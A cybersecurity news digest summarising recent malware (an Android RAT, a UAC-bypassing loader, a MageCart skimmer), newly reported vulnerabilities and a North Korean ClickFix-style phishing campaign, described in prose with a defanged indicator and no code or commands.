Cybercriminals aren’t just after your data, they want full control of your device, and they’re getting better at it. The new BTMOB RAT is spreading through phishing sites disguised as streaming services and crypto platforms. This upgraded version of SpySolr RAT goes beyond basic spying and leverages Android’s Accessibility Service.

Hackers never forget old exploits. Attackers are ramping up efforts to exploit vulnerabilities from 2022 and 2023, targeting unpatched ThinkPHP and ownCloud systems. Researchers have tracked nearly 600 unique IPs abusing these flaws, proving that even years-old vulnerabilities remain dangerous if left unresolved.

Kimsuky is turning fake error messages into a weapon. Inspired by ClickFix campaigns, the North Korean APT has been pushing info-stealers through deceptive pop-ups, tricking victims into running malicious PowerShell commands. Masquerading as a South Korean official, the group lures targets into downloading malware under the guise of document registration.

Top Malware Reported in the Last 24 Hours

New Ratatouille malware bypasses UAC

A newly identified malware called Ratatouille (or I2PRAT) is causing concern due to its clever ways of bypassing UAC and using I2P for anonymous communications. The malware spreads through phishing emails or fake CAPTCHA pages. When a victim runs an embedded PowerShell script, a loader is activated, using advanced techniques to raise privileges and evade defenses. Although it initially exploited a Windows RPC mechanism, recent security patches have needed it to switch to other methods like process migration. 

Android RAT spreads via phishing sites

A new Android RAT called BTMOB RAT has been discovered, targeting users through phishing sites. This malware is an upgraded version of SpySolr RAT, focusing on remote control, credential theft, and data exfiltration, posing a serious risk to Android users. BTMOB RAT is spread mainly through fake sites mimicking popular services, like iNat TV and bogus cryptocurrency platforms. A malicious APK named lnat-tv-pro.apk was found on the phishing site hxxps://tvipguncelpro[.]com/. The malware features live screen sharing, file management, audio recording, keylogging, and credential theft via web injections, utilizing Android’s Accessibility Service for control. 

MageCart hidden in <img> tag

A MageCart attack was identified on a Magento-based eCommerce site, where malicious JavaScript was embedded within an HTML tag. The script, hidden in a Base64-encoded image path, activated during checkout to steal credit card details and transmit them to a remote server. Attackers leveraged the “onerror” function to execute the script when an image failed to load, making detection difficult. This technique bypassed security measures and remained unnoticed by users.

Top Vulnerabilities Reported in the Last 24 Hours

Beware of this “whoAMI name confusion attack”

A new security issue, called the whoAMI name confusion attack, has been identified concerning Amazon Machine Images (AMIs), putting users and organizations at risk. This vulnerability allows attackers to create fake virtual machine images under deceptive names, leading users to mistakenly use these malicious images in their AWS setups. 

Stable channel update patches Chrome

Google has launched Chrome version 133.0.6943.98/.99 for Windows and Mac, and 133.0.6943.98 for Linux, addressing four serious security vulnerabilities. These issues could let attackers run harmful code or access sensitive information. Users are urged to update their browsers right away. The update will be available over the next few days and weeks, fixing vulnerabilities in key parts of Chrome like the V8 JavaScript engine and the Browser UI. One major fix addresses CVE-2025-0995, a critical issue in V8, which could allow code execution that compromises user security. 

Rise in ThinkPHP bug exploitation attempts

Increased hacker activity has been observed targeting poorly maintained devices vulnerable to security issues from 2022 and 2023. GreyNoise reported that attackers are exploiting two critical vulnerabilities: CVE-2022-47945, affecting the ThinkPHP Framework, and CVE-2023-49103, related to the ownCloud file-sharing solution. CVE-2022-47945 allows unauthenticated remote attackers to execute arbitrary commands. Researchers witnessed 572 unique IPs attempting to abuse this bug. CVE-2023-49103, linked to a third-party library, has also been actively targeted since its disclosure. 

Top Scams Reported in the Last 24 Hours

Kimsuky gets inspired by ClickFix campaigns

North Korean state actor Kimsuky has begun using a new tactic influenced by ClickFix campaigns, which distribute info-stealer through misleading error messages. These prompts trick victims into executing harmful code via PowerShell, leading to malware infections. The attacker pretends to be a South Korean official, gaining the victim’s trust before sending a spear-phishing email with a PDF attachment. To read the document, victims are sent to a fake registration link that instructs them to run PowerShell and enter provided code. This code installs a remote desktop tool, allowing the attacker access for data theft.